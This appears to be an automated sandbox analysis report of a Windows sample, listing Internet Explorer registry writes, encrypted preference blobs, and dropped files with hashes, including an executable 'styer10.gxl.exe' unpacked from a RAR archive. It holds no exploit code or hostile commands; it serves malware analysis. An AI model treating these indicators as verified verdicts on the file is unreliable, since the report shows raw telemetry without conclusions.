00000000A6070000AF35DC40B679E15CA589F83A0938AEF022CD49EC50832F3DF7FCE071CABCA048D7F8D3693ED07FC709A6190EDC1073F7BB0C4C2D4D64A4F9EA7923479BE563079D9C7A4DA883FB255FABC0AD1FA075735C7DAC120BB20409ECAF13725BE46CA609C23E7F2DB44918D939891C3895C5AB1BBFB5D0428DF8B55E3E906439D75DEA7608BE61FB81E56A76F1772C360F118FF771597348153A5178C675C2F4DF7311310F6CBB1B0CD5449D71ECE9FE2DF86953353BC0B06A69910EE73058711DF4ED94772565E273592B105B959C9C11CAE717AA222A8BAC24B528412BA450AF61540FE08F037CD880CF2B4C6B5430DA976BCF6FF2D1A8FB5280227454E8ECB6E9D6C1EA9BD09F5903B086E88B0843A8DCB20E263B99EB773602981F85D3CA52A6D06436F1780618798B38CD3A468D9AEBC7726E0A47D940AF2DB8E4C3B95EA4FCC6576233006334B49BDC9AC46ECDD20F49DEE6CEB8D8761C43A062375549CA9C0E0B0FF3C4E0CCDBAC6CF18E851F6FC9FD26300323DF39C108D539D822D5E515D0FBDD62812B02F6F8E8702A917A91F0B762EBDA67EDA9DAD0F1093B446C16F94E916C0D6CF1F4DAD981B8958561584A8AC3B66C75FFE619551472EAF9767B2A85B05CB6626EC44F4B386A55C7B8E3CB4D2E33FCBAB910565F061415A5FD35F216694E0E1FCB904B39DE245F35EC545074800076ABB747C73D3E8FDD64BF64808546E0C887587A00A144880CCB07CAE92ED7BFFF4DFCAB28117A835C35692949C51EB36606EDA03083B934DACE0E658DDE280FB8E1B75CCDE12C90EFAA6CA229127F67BBF44624A7A185C9598D80442EE0DC8F26919D7A688772560238D6F0E020C99CF314E024991136E805AA9789DD97FEE1B63280253E648574C6028D332D99B4F2CB1E33C2869CB32F7300E853BCDB26A4691D977D4DEDA88CE94B378CEDE494096B58971CEAEF04400A0B27C2E1A7B977810771A36100D13D4F64AA19544950820F402B54C69BD8B994EB44F6FC1EA3FC97FF2CB5740EC627703581FBF05576FB5449EE889BE8F93B0DF1D80E90E24FD2C36762D4BD13A2EA36566B53BA9F181508A414DADB710F6710BC8E2C3AB88C98B80C3520986010265BB2163F6DCFFF70C1198F68E599B2DB09E90D6F1379F9F0FD474AB99B32387B38C0C1E051FAC2AC49F7F55485C952397B5279F7525C1E79442F4FBFCB1A378908489C566B538869E70628BD5882D61F7EDBB5E3EC8592D263DB615217371DF0F3BA1AC243246C48EA99C3C2B439302FF3D1C0554FF0839DB8B73A92543D61508215F442F21B18E72BA6698550111E0748DBEA6C4E9E45797BE46C9FE24F9248D85DE3F713E93AE758EDD4246850B9488C732148EA1EA805B5AB2F99B8A7977A4CA17C02B829E2E8593943C188B744932BFB6B09B66318E3B1021BA0180FE085CA9139812AA4DD8AD7A5DE7AAEA3CE866355C6CE3FE46CB21E1A17D4C726FC09E9A8EA9581D5846D03FB187194F86AC37A17FDB97D13FA11F5046255E67F9DA683DFEC5EBCCE8B31D019B6C444E65EE86F4707E9032104A2376608433084EBFC27F31AFD665F48779F7161951977BC9618A94A7E351473046D3703BEA52F16AB3B3F19907D923DDDC691BE02BFF1246EDA9F6D984A29BED6FF9809E69F9636533E208D387B7C5A049FBC3B2D3608DB0E2B97A0566C8A04BA78B5A4DBAF4172946FEB4116B856D68CD398A834CED945184508B6DA0852704F47B2DFBDB452140E787654486AEBC71589E46E39DBC10D2AEC0228432BE39434F1B6F3ACCE7F6461592CFEEFC753813FF44BD85A56FA8EE5FC4E0FB15287100B45F9F6C8F3D9942CD7B5942B720228AB2D310BB9A20A3BEAF719D543EB68787352E4C3314267BE11C32C781D1E204DF795A97575D80997D73035D11B19D4D80B3549DE07568ABEAF80E515E3313C00C4B86DEFAD7AAC7C4EECE65E5811CF3A75E1A2C56AFE3BC9A6B9C5D49E3743F4B20DE573832927ECED9E42381A97FA6A50FB65CE7AFA10E8961027766F2ECEC0618343FB1517DF8E552C207C81DBC7D03BB865A757B7150F1F7B523B74F6C0BA71DAB1418580EA25274092F6ACA0FD36D86147BE21E4750AE1B881DCCECA326E83D586C6F1855F8401F6F9F1BD7A8DC1C598FFB7F889F2397C9A7BB39D59AE673567955F7BAA7649856EA21DD3B0B4E5A4E86C88FC9E2F08902BB66102A2BB03283383ED41E479F951F3F1150EEC750E1407F1D24DC9C60BBD200EE01B57BF3CFC97371A65FE858206B825828D4959AFB49B2B8E0B4D336CA3C00DE8093623D75101518A05191A2D45D2A3E472CF83F4265EB89356ED89A1E1FFC38BEC61D782C73AB43543D97BAEAC7AD5EFDC49193709F500B34E0400A119B52836E57F1A92FED622FE3D99E051DDEA9724EBE0F399FCA8217014F048EEEA1D17FE123B987697B3E703154576CD76653B07BF27A541A19FDC62C69FB5D1F46BD1EE9492D76830959281E9D92C94184511BB775DCE549786987D854437F9D763157F8C4AF4026A6EC110DB835B0D649C88CE3578C1CC7D34785671741F1B334CC82D18FFABAAE5AFF8CE092730F1F8BEE05E18D576E7F561774CAA9ABC28A8A528CB59CDBB82417892EA95B1EC5F769961454042D4549E3CA157509EC436D6A597956FE78C821E20B4759ECAFCFA7C7E3294CCCE3CB71718534483F387415DAFED1A7B952E601DDD5DE24380D160AC76AFB4DEF578F802548D5563DBFC61DD7D62E59B9CA743DC4F801EA6010000000E0000007A67784775642F5046646B2533640200000000000000
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\User Preferences
88D7D0879DAB32E14DE5B3A805A34F98AFF34F5977
01000000D08C9DDF0115D1118C7A00C04FC297EB0100000077D76C230A80484BAECD07D751B63AF800000000020000000000106600000001000020000000330B482C4F30604018D005ECD9469651D23BF0859826C7D4F597323E553AE0B2000000000E8000000002000020000000FC72E2A235E6AE7DAFA401366F8DF3373DC831BD6A97F76AB744A6BEE8A5250950000000E30EDE90929AD65CF7258D722EDEB5A9F3A9223261A1794F5C1E1F863B5AE699BBE5F59EBC3F0FADC48275EEF598499911536DE0CB23C598E0D19B019BA78B3EB292452ABDF4D158B18132A1161F5C3D400000006CE9F0050FF99E63038B545369D8669DFF5FC16A323DE538DCEB13ABB79461B50E854C0E10FE125924900E5D0B05A1A4BBBCF8783DD24386CAB16690E83F2E6B
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\EUPP Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\DSP
ChangeNotice
0
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\User Preferences
2D53CFFC5C1A3DD2E97B7979AC2A92BD59BC839E81
01000000D08C9DDF0115D1118C7A00C04FC297EB0100000077D76C230A80484BAECD07D751B63AF8000000000200000000001066000000010000200000003D603E3D0F4F3CC2B034846906755CCBA803CCD58ACE1EE70D865EA316BF5963000000000E8000000002000020000000323AA9F115918F2497C54B321F0212678F990859178B72571D3A4C66FB20FA5F10000000A173104C46F964C6E88DF11FC773C03240000000A91626AB41533BBB61AC8E331AC506DCFAFC39D64016647E1B6340D7DC65603E4C4A020EFDB99BD78F606933055C3395D7ED9D62598132C385958E033BFFBF5D
1440
iexplore.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\71\52C64B7E
LanguageList
en-US
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
DecayDateQueue
01000000D08C9DDF0115D1118C7A00C04FC297EB0100000077D76C230A80484BAECD07D751B63AF80000000002000000000010660000000100002000000009EF1B8849D87C2335A465B4DF3479E5110B790DEDD560AB991D95877822BCF3000000000E80000000020000200000008FAC6CFD9EB492672B39BC506FE6B9A7BE0C8F28E6813C02895ABA21C57A7C02300000001020DF572D9BA6FF32073C87C191D0E2FEEA808753C8384EE4C83205A6173ABD87BF6BEBAACF937529B4572A4EFC80D8400000003AFD3642A0C270D982F8447FD3D944033D8DB159D334B33E43470AE22BC5C937E258C55EEDF05AB3D132408F63BBFFF512FFAB1F7C3EF5569DB2077B41BA6BB1
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
LastProcessed
F0C2F542783DD501
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MINIE
TabBandWidth
500
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Content
CachePrefix
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Cookies
CachePrefix
Cookie:
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\History
CachePrefix
Visited:
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\avast.com
NumberOfSubdomains
1
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\Total
3248
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.avast.com
17
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\avast.com
Total
17
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\Total
3231
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.avast.com
0
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\avast.com
Total
0
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\Total
3259
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.avast.com
28
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\avast.com
Total
28
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\Total
3278
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.avast.com
47
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\avast.com
Total
47
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\Total
4069
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.avast.com
838
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\avast.com
Total
838
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\Total
4101
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.avast.com
870
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\avast.com
Total
870
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\Total
4121
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.avast.com
890
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\avast.com
Total
890
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\Total
3325
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.avast.com
94
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\avast.com
Total
94
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\hotjar.com
NumberOfSubdomains
1
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\Total
3345
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.avast.com
114
2828
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\avast.com
Total
114
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
CachePrefix
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
CachePrefix
Cookie:
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
CachePrefix
Visited:
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
CompatibilityFlags
0
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
460000007B000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
SecuritySafe
1
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
{8D26CD23-A96B-11E9-9FBD-5254004AAD21}
0
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
FullScreen
no
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery
Active
0
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Type
3
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
5
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E3070700040012000E0033002A00D301
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Blocked
5
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
DecayDateQueue
01000000D08C9DDF0115D1118C7A00C04FC297EB0100000077D76C230A80484BAECD07D751B63AF8000000000200000000001066000000010000200000006BA3BDAFF05FDDBBC59121FBEC7156526AFEA3F8AD6BEDDB82B0A5F98A134EA0000000000E8000000002000020000000F96CF196575C73B85815E02933E79D523DC45FBE973B9E0E59D112ACDEAEAEE5300000001B67F9B5BC1033F4DF92523027C9D8663F549C8A1F2AD1B59F3CFC90EF604D52839255EAFC14645CC846833CE3A923EC400000007E8B572917327BBA401BA1101D8DD1785A58625DE3353C7D0D2128679899F0574FAA754B6FDE9F71EDEBCAF7ECACA5B042811E6D2E50525D8354174D7ED942D3
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
LastProcessed
000BDB50783DD501
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch
UpgradeTime
FE690851783DD501
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch
UpgradeTime
58CC0A51783DD501
1924
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MINIE
TabBandWidth
500
2640
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Content
CachePrefix
2640
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Cookies
CachePrefix
Cookie:
2640
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\History
CachePrefix
Visited:

Files activity

Executable files
1
Suspicious files
8
Text files
66
Unknown types
11

Dropped files

PID
Process
Filename
Type
2940
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa2940.39322\styer10.gxl.exe
executable
MD5: 30a498429be3c5a959ae12f9f9da118f
SHA256: 6688157e9d21a6a350cc479490e572475f377e6b0c87c894286a417dc2ae22f4
2828
IEXPLORE.EXE
C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\HMU51R4Q\www.avast[1].xml
text
MD5: c1ddea3ef6bbef3e7060a1a9ad89e4c5
SHA256: b71e4d17274636b97179ba2d97c742735b6510eb54f22893d3a2daff2ceb28db
1924
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\imagestore\toi5kkc\imagestore.dat
binary
MD5: 72f95a269682efbfcc0eb2ade7d5fbb4
SHA256: 11422212af04af53f76632958cb409c9eb13d450228a4a74a38a3e170ffa0f73
1924
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\favicon[2].ico
image
MD5: f74755b4757448d71fdcb4650a701816
SHA256: e78286d0f5dfa2c85615d11845d1b29b0bfec227bc077e74cb1ff98ce8df4c5a
1924
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{8D26CD25-A96B-11E9-9FBD-5254004AAD21}.dat
––
MD5:  ––
SHA256:  ––
1924
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DF402273B03658937F.TMP
––
MD5:  ––
SHA256:  ––
2640
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\OJIX3ZAU.txt
text
MD5: c6df707bf03637d8b085d701cd63bdbf
SHA256: 46baec15b93e1d547da29a2a1512c872585dbfd4c0d3edb4d33ec1eb6f515d81
1440
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{7C25DFC5-A96B-11E9-9FBD-5254004AAD21}.dat
––
MD5:  ––
SHA256:  ––
1440
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DFE92E26AD32977E72.TMP
––
MD5:  ––
SHA256:  ––
1440
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{7C25DFC7-A96B-11E9-9FBD-5254004AAD21}.dat
––
MD5:  ––
SHA256:  ––
1440
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DFC4314BE1F2DE6085.TMP
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\v1[1].gif
image
MD5: 57f187c7a868faeac558007a8eb6cb2e
SHA256: aa03dc59bdca72631d2301e4297cfa030bd31b907dc138e7b973d12311c90a22
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\T7TROJ1C.txt
text
MD5: 8862cdd5088107df8015047207c6719e
SHA256: 86bc90c0cf6bc932103a9103f584f940a4eb765849f63d6175f66f98f64edd58
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\ec[1].js
text
MD5: 7b430c6350a59a7cf22b9adeccba327b
SHA256: 058ed961bfe422af7bfc65865f4c08531ec8ace995f8a1ec560a46581cb7712c
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\js[1].js
text
MD5: 52049cfa217072bd55ab81788698c41b
SHA256: c44f65d6a3672d78419ef8cbf19902a82d8381d1b15687795cc1f2ba45202736
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\9BLWIGFF.txt
text
MD5: 497cddfb0351c653cfc62d9bfc0266bb
SHA256: ea833a662f9d441ddd9093a69eff94bbdcaab9e2c2394005058e86ad3b1bbc07
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\HO0RBL91.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\HSH601LB.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\UW45TMCL.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\PWLVG21C.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\94LAVPQ3\vars.hotjar[1].xml
text
MD5: c1ddea3ef6bbef3e7060a1a9ad89e4c5
SHA256: b71e4d17274636b97179ba2d97c742735b6510eb54f22893d3a2daff2ceb28db
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\box-90f3a29ef7448451db5af955688970d7[1].htm
html
MD5: 90f3a29ef7448451db5af955688970d7
SHA256: 192c6db5febe42023288fd11b0418aa35680c75f81098b4b3978614006f1c112
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\EVHKO1QF.txt
text
MD5: 2cf1d64cdb91754394e2f65b57b7f10b
SHA256: b33ecc719971cd9e9ef12606613690e6ca21cea99003196fab572b3d79fb398c
2828
IEXPLORE.EXE
C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\HMU51R4Q\www.avast[1].xml
text
MD5: 8a0181f939243f923ed534eca8afac45
SHA256: d2715375f046d31068a626c771c826d2798340907fd98b81d8ae5e63f8322655
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\31I1MDDA.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\BGVX0A1R.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\advert[1].gif
image
MD5: df3e567d6f16d040326c7a0ea29a4f41
SHA256: 548f2d6f4d0d820c6c5ffbeffcbd7f0e73193e2932eefe542accc84762deec87
1440
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\favicon[1].ico
image
MD5: 9fb559a691078558e77d6848202f6541
SHA256: 6d8a01dc7647bc218d003b58fe04049e24a9359900b7e0cebae76edf85b8b914
1440
iexplore.exe
C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
––
MD5:  ––
SHA256:  ––
1440
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\favicon[2].png
image
MD5: 9fb559a691078558e77d6848202f6541
SHA256: 6d8a01dc7647bc218d003b58fe04049e24a9359900b7e0cebae76edf85b8b914
1440
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\favicon[2].ico
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\HMU51R4Q\www.avast[1].xml
text
MD5: d723d4fa33bae6aefab23c5f05618ccf
SHA256: 5b8718ca2640e910055fb6aa27e17eacd70f4daa6c7351650cb04734a32d035b
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\modules.cf35bc326ce7f74ad61b[1].js
text
MD5: 0120f403c0007d686e56f4c375180b58
SHA256: 44c769286c10756e4c81e429ba96c3b4334dfa439848e036ca04ae641c8f3d75
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\B1P0DYN7.txt
text
MD5: 002137c2c8e7468ef4ff1d04a25e6b15
SHA256: 1d4e28ae695039f5dfc5b676f3850dec68901b465165020796df01ab62e17acf
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\PP78EDT2.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\VFSOQZKN.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\AESEFFJB.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\8R4DKELM.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\YTV9UM37.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\YZRJCGQU.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\GSQLOC7P.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\3HAUXSRS.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\552LMCBD.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\P0QEI6TA.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\3Q6M2WMJ.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\PZJL8XOD.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\OPV0LW1W.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\Q8N0R9EF.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\GPPCZAV0.txt
text
MD5: 6c040ecb26aa92736c04d61eb7e7e78b
SHA256: a36f5efe4b2bc8e9f5f4aed0a3e8e1296ccb4fb1c5e0f743568278410b7b7c53
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\tooltip[1].htm
xml
MD5: 565466cc885b93457076cca068c9bcfb
SHA256: 88627dc4e16cff88ccfa389d4709d9c6abab9a6c4e32f0e2c7070a8705d8e06a
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\watch[1].js
text
MD5: 8fe4a910d25df8ed59c748c91e330dc1
SHA256: 274e349536fcfd3c874610f31f136918a6e4f659029dc966568818dc25dda396
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\LBZ59RZ8.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\slide-top[1].png
image
MD5: 09c7fca5ff8aa8e74c1527995ec65aa4
SHA256: 412702b3bc950702a368f5bd3dfa9c6fcd93887b35cf6b1aec25c2a9a69ddd28
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\analytics[1].js
text
MD5: 4d88a66690f3506e6a2112b1c4dce0b4
SHA256: a4883cce814b6793c5bd6dd3639d6048ecab39a93a90b560d39a9fd0aff6e263
